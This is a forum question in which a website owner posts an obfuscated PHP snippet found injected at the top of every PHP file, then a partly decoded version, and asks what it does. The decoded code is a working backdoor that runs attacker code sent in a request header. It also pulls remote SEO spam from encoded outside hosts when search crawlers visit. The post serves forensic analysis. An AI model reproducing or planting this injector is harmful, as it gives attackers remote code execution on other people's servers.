# Base64 encoded string in every php files, seams like malicious

Tags: php, base64, malware

I have noticed a suspected code in the beginning of every *.php file, of my website.
The code is this`<?php                                                                                                                                                                 /*versio:2.18*/$QOQ0=0;if (!function_exists('QOOOQQQO')){$GLOBALS['QOQ0'] = 'lFZY3VybA!rxsOX2luaXQEaYWxsb3dfdXJsX2ZvcGVuEPMQaHR0cDovLw JndheT1maWxlX2dldF9jb250ZW50cwCDvX3NldG9wdAX2V4ZWM_JndheT1jdXJsg?R}myvfHLw~a29ubW8ubmV0YS1pbi1hLWNpcmNsZS5jb20OcGhwYWlkZS5jb20=BdwUF=WV8XnKOgwr(%ZGlzcGxheV9lcnJvcnMgZGV0ZXJtaW5hdG9ySv)YW5k&@beMi4xOAT;&Rll4OGk4d2YwdzhkMAl?.jYmFzZTY0X2RlY29kZQMnYmFzZTY0X2VuY29kZQYOhSFRUUF9IT1NUdW5pb24vc2VsZWN0%xJUkVRVUVTVF9VUkkxU0NSSVBUX05BTUUWvGUVVFUllfU1RSSU5HLmPw%iLL3RtcC8uZm9udC11bml4ssTVE1QVEVNUAVE1QRElSUedG1wptd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ)mdXBsb2FkX3RtcF9kaXIV%WL3RtcA^kLgMwudmVyc2lvLQ^LXBocAYs!pSFRUUF9FWEVDUEhQb3V0hdfb2sw&SFRUUF9VU0VSX0FHRU5U.;LAwOBZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgnjF&fL3BnLnBocD91PQze^Jms9JnQ9cGhwJnA9YGJnY9OaWG%ZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlYyMXY0a1lRL2lzYkZFVzI1SFBYR1BQUzFCVW9SeHFrRkFjQ0o1MXl5T0pnU2F3REd4blRYQlR4M3pzenUydWI0T1RhK0VQTXp1eTh6elBqYU1XTXM2VllSYkZZR3JXbHlFUzZpZUo1bHFRMTAzeGxxMzI4eUtJa1ptVkt1QkxKeWpnZk9BTm43VmpzNG56RUF4NEV6R2ZENmUydHlWNVpjYktKRm1tU1JSdGhaT2xlbUpjc0ZkaytqVmxaQkp3ZUNrMlBJbHRGYXdIRU5UNFdDQnNGbkFkZ0RSekIzd0RFam9JZ0dNRzU0VnFzQ2ZkQklZY0RvQ2dlTytkd0doWnJBVXMzaXFOd0p6SWpwOVRoY3AyYkZrTUxJZ2dFc1R4V3NKak1MK2xzZUhCb2twK0ROZGcvOEx0b01kNE1GMG1jaVRqYkZTSWFMVkRBVFdZejVSRytTWmZzUXFiWHRwZ0xpdklBS2RFWUdySGVDVFJQaHlnVVA2TWRxRkJPWTU1a3dOSC9yam8xTUNxZ3puRUdWVkhwT0dRVlJXNFVqSGhsNUxpalFxY0VHVXFOeGE2bTQ5dmdiaExDUDR2OVQxY2QzZ0cydXZtaDRKdCs3M04vYkszbTRQdUhqT1ArWkRvZVRzYTk0ZjAxWEZCVjlqNy9WVEFjOXE4bWs4SGYvV0E2c1pnblk0Q21xZWhoT1BROUZMWFlwK3R3c1U1Mm9uU0srUkNiYmZaaXFNdVFoVUpNNFdzZFFnSmhQdVJwbFR3NnJWUkQxQVNvZkxWTEZqK1NyWWlMNG05emFnRFVpeThRU2g1SW85RUMzVUN5NVpCV3Bad2ROeWk0dE5ydXNYNTBCOWYrNmsvWXE4clU0ZUo1L3VLakpTSmpONVBKM1crT3piK2wzK0tiWkpmOURtelN0QU1lMWFqSUhIeEErTjNOWFJqY2wrckg1ZGdvTnA1LzZZL3ZCOEd3UXZkMEo5SlB2VWRvR2hKT3draTRWdkQ4aEhCdzlnRUNLZjlNZG5IQmpEZUl3ejRWNUQvQW1pSlNOa1ljZXJaa2pGTnZFeGgxVnlyZk9VQ2REOEJwS0dpZmlaL2JkYklVUmkyMzBkSWlnVzhmSThRbzdnYytLeG82MmxUY2szeWtFeDlJTUtZYXRQVFNkUDVpbEVMcFVzK1VtczBoR0hLUGpwcllXUjUyVmc2bnoybVVrU01PTkxkRjRNQTVSSUhLaDlTTkFMNVUwVW1tUWw2N1NVZ0g3TjJWRWlTdjVJSXVpMWhKaXZJbDE1L3NNMGk0N0JLNFIzaUR5WGhsWXZHVWxHeEhSSEpOV3pHV3FxalRvaXBTRjIyS1g0MnlkSXJvSE1QVU1XWFp5N0ZXb2lLYU8wMEYrQkI3eEFpL0lEZnFGbXVvWVFLdWxDZ2UxMk1HUyttSWdoRnZLeExjS3BIYWppWkJYQUdMQ3BMTEN4STFrLzhXUW5PSzdlK3lORXZXeWJOSWplNTVlTjhmUXlzOUZLTHFkU29NTExSVmtvcjU0Z255R21KRHozZE1CZFAvczRnNjVoMUViaE9hSDNoWTVOdDFhVllpbEtHRUIzVjk1bGZnbVI1Szc4ckNhTGIvbTZ3RFdHV2NSVHRxblZNWFBaZXFlaVpIN3Z0MHd1OVRzbXFLR1VKbVpRamJMU3FMMmEvRTIrVWRnTk1TQUFQdUk0bXlGeVJTNHpoeWZKM1dxbHU1bnpnVUFIZUF2YnRaZW5vWTJLb3ViWVd6cWhobHJUaFF6UDR5U3VNNUFGOFlYZzl1KzJGbzJwOEhZeGgyd2ZncmFMdnJqWHZ3cXBjbG5xTk15U3VIcTVXb3dyNEdZbEREbkwxRGJHR0xTR0ovK09XZGE4ZVVob3NsVW5sSFMxT3VGWERROEVoY0pRVVNYYThtdFhHUFEvZzhYZkU4M2lMTUtBT3BWKytnZm9zZGRaVUtHL1VWVnJOdXB6TzlDTWhER2pIMGF2dVY4WmVyNWk1RVJKMS94MVczZEZPYWp1dVlQTHhrMzBIL2ozeENaSnV0ZitLZjV5cU1sR1dqVk9SWnF1RVlENytHdmVua3BqYnpmY1dtTVZnamFsZGhkU0ZXOXJDbEViR2swT05hSVlKb21VQWJlYkdmZ0tFRFg0RmpWZmQ1VFZkMUgwNFo4Yzk4clcrQmpGK1kxK3JJVWlodDBVMGNJalNEWUVuT0RFNnZPdUR5dXdJaVNMcXlaTDk0a2ovcDYyQ3gzaTlGbU1RTG9ROGx5c2x1eE9idHdpWW80Z1ZPY1hWRXdCL0F5b2pkMVAwWXFqMmNjTkJjUjFDdHQ0bWNxK2xncVphZGFqcndiZURCVktmS3czMkVVbmNFdm1TQ2xWUFBmUCthTm1mSlZuWlZWbWZ3WmxWc3RrQ0gwNUFWNUpRVDJ1eDRHR1JkV21XQ1hPTlBhNkRsdVBLS3JCcWFqWUg4T3NzLzd1U2lBd3RTOFgxMytTWWxoK1BLaCtkZkJKTURyUT09IikpKTs*WcHJlZ19yZXBsYWNl$';function QOOOQQQO($a, $b){$c=$GLOBALS['QOQ0']; $d=pack('H*','62617365363'.'45f6465636f6465'); return $d(substr($c, $a, $b));};$QQOO00QO0 = QOOOQQQO(3287, 16);$QQOO00QO0("/QOOQ0O0Q0/e", QOOOQQQO(722, 2563), "QOOQ0O0Q0");};?>`

I have decoded this with unphp.net and this gave me the code:

```
 <?phpif(!defined("determinator")){
functiondeterminator_feof($I1I1l1,&$Q0O0OO=NULL){
$Q0O0OO=microtime(true);
returnfeof($I1I1l1);
}
functiongetfile($IlIlIl,$QQO00O){
$IllllI=QOOOQQQO(3,6);
$Q00OQQ=$IllllI.QOOOQQQO(14,7);
@ini_set(QOOOQQQO(23,20),1);
if(@ini_get(QOOOQQQO(23,20))==QOOOQQQO(45,2)){
$Il1l1I=@file_get_contents(QOOOQQQO(47,10).$IlIlIl.$QQO00O.QOOOQQQO(58,30));
return$Il1l1I;
}elseif(function_exists($Q00OQQ)){
$Q0O0OQ=@$Q00OQQ();
$IlI11I=$IllllI.QOOOQQQO(91,10);
$Q0QOQ0=$IllllI.QOOOQQQO(101,7);
@$IlI11I($Q0O0OQ,CURLOPT_URL,QOOOQQQO(47,10).$IlIlIl.$QQO00O.QOOOQQQO(109,12));
@$IlI11I($Q0O0OQ,CURLOPT_HEADER,false);
@$IlI11I($Q0O0OQ,CURLOPT_RETURNTRANSFER,true);
@$IlI11I($Q0O0OQ,CURLOPT_CONNECTTIMEOUT,5);
$Q0OQQQ=@$Q0QOQ0($Q0O0OQ);
@curl_close($Q0O0OQ);
if(empty($Q0OQQQ)){
$Q0OQQQ=QOOOQQQO(127,0);
}
return$Q0OQQQ;
}else{
$I1I1l1=@fsockopen($IlIlIl,80,$QQQ0O0,$QO000O,5);
if($I1I1l1){
$Q0000O=QOOOQQQO(127,0);
$Q0O0OO=NULL;
@fputs($I1I1l1,"GET{$QQO00O}&way=socketHTTP/1.0
Host:{$IlIlIl}
");
$I1I1I1=PHP_OS.QOOOQQQO(130,2).PHP_VERSION;
@fputs($I1I1l1,"User-Agent:{$I1I1I1}

");
while(!determinator_feof($I1I1l1,$Q0O0OO)&&(microtime(true)-$Q0O0OO)<2){
$Q0000O.=@fgets($I1I1l1,128);
}
@fclose($I1I1l1);
$IIlIIl=explode("

",$Q0000O);
unset($IIlIIl[0]);
returnimplode("

",$IIlIIl);
}
}
}
$QOQQ0O=Array(QOOOQQQO(133,12),QOOOQQQO(145,23),QOOOQQQO(169,15));
functionwrite($I11lll,$Q00O00){
if($QOQQ0Q=@fopen($I11lll,QOOOQQQO(186,2))){
@fwrite($QOQQ0Q,$Q00O00);
@fclose($QOQQ0Q);
}
}
functionoutput($Q0OQ0Q,$Q0Q0OO){
echoQOOOQQQO(191,3).$Q0OQ0Q.QOOOQQQO(197,2).$Q0Q0OO."
";
}
@ini_set(QOOOQQQO(203,19),0);
define(QOOOQQQO(223,16),1);
$IIIlI1=QOOOQQQO(242,4);
$Q00QQ0=QOOOQQQO(250,6);
$QQ0O00=QOOOQQQO(259,18);
$QQ00QQ=QOOOQQQO(281,18);
$I1111I=QOOOQQQO(301,18);
$IlIlIl=QOOOQQQO(47,10);
$IlIlIl.=strtolower(@$_SERVER[QOOOQQQO(322,12)]);
foreach($_GETas$Q0OQ0Q=>$Q0Q0OO){
if(strpos($Q0Q0OO,QOOOQQQO(334,7))){
$_GET[$Q0OQ0Q]=QOOOQQQO(127,0);
}elseif(strpos($Q0Q0OO,QOOOQQQO(342,8))){
$_GET[$Q0OQ0Q]=QOOOQQQO(127,0);
}
}
if(!isset($_SERVER[QOOOQQQO(353,15)])){
$_SERVER[QOOOQQQO(353,15)]=@$_SERVER[QOOOQQQO(369,15)];
if(@$_SERVER[QOOOQQQO(387,16)]){
$_SERVER[QOOOQQQO(353,15)].=QOOOQQQO(405,2).@$_SERVER[QOOOQQQO(387,16)];
}
}
if($II11I1=$IlIlIl.@$_SERVER[QOOOQQQO(353,15)]){
$II1lI1=@md5($IlIlIl.$Q00QQ0.PHP_OS.$QQ0O00);
$Il1IIl=dirname(__FILE__).DIRECTORY_SEPARATOR;
$Q00OQ0=Array(QOOOQQQO(410,20),@$_SERVER[QOOOQQQO(433,4)],@$_SERVER[QOOOQQQO(437,6)],@$_ENV[QOOOQQQO(433,4)],@$_ENV[QOOOQQQO(443,8)],@$_ENV[QOOOQQQO(437,6)],$Il1IIl.QOOOQQQO(453,4),$Il1IIl.QOOOQQQO(459,24),$Il1IIl.QOOOQQQO(483,22),@ini_get(QOOOQQQO(507,19)),QOOOQQQO(529,6),);
foreach($Q00OQ0as$QQ0OQO){
if(!empty($QQ0OQO)){
$QQ0OQO.=DIRECTORY_SEPARATOR;
if(@is_writable($QQ0OQO)){
$Il1IIl=$QQ0OQO;
break;
}
}
}
$tmp=$Il1IIl.QOOOQQQO(537,2).$II1lI1;
if(@$_SERVER["HTTP_Y_AUTH"]==$II1lI1){
echo"
";
@output(QOOOQQQO(542,8),$Q00QQ0.QOOOQQQO(550,2).$IIIlI1.QOOOQQQO(553,6));
if($I11III=$QQ00QQ(@$_SERVER[QOOOQQQO(563,16)])){
eval($I11III);
echo"
";
@output(QOOOQQQO(579,4),QOOOQQQO(586,3));
}
exit(0);
}
if(@is_file($tmp)){
@touch($tmp);
@include_once($tmp);
}else{
$II11I1=@urlencode($II11I1);
$QO0QO0=@strtolower(@$_SERVER[QOOOQQQO(591,20)]);
foreach(explode(QOOOQQQO(613,2),QOOOQQQO(618,55))as$I1l1I1){
if(strpos($QO0QO0,$I1l1I1)!==False){
if(@touch($tmp)){
$QQO00O=QOOOQQQO(678,14).$II11I1.QOOOQQQO(695,4).$II1lI1.QOOOQQQO(699,12).$IIIlI1.QOOOQQQO(713,4).$Q00QQ0;
$QQOOQQ=getfile($QOQQ0O[0],$QQO00O);
@touch($tmp);
}
break;
}
}
}
}
}
```

Is it possible to analyze this code and determine, what this code exactly is doing?

Comment: yes, it is. You need to manually make sense of the variable and function names.

Comment: If it is your server, and they are your files, and you didn't add this - I (without trying to understand it) analyze this as not being in your interest :)

Comment: So, the main goal is to make forensic analysis of this code. To conclusively demonstrate that this code is malicious.
I changed the variables and function names for easy reading.

Comment: @Fluffeh This code is not on server anymore :)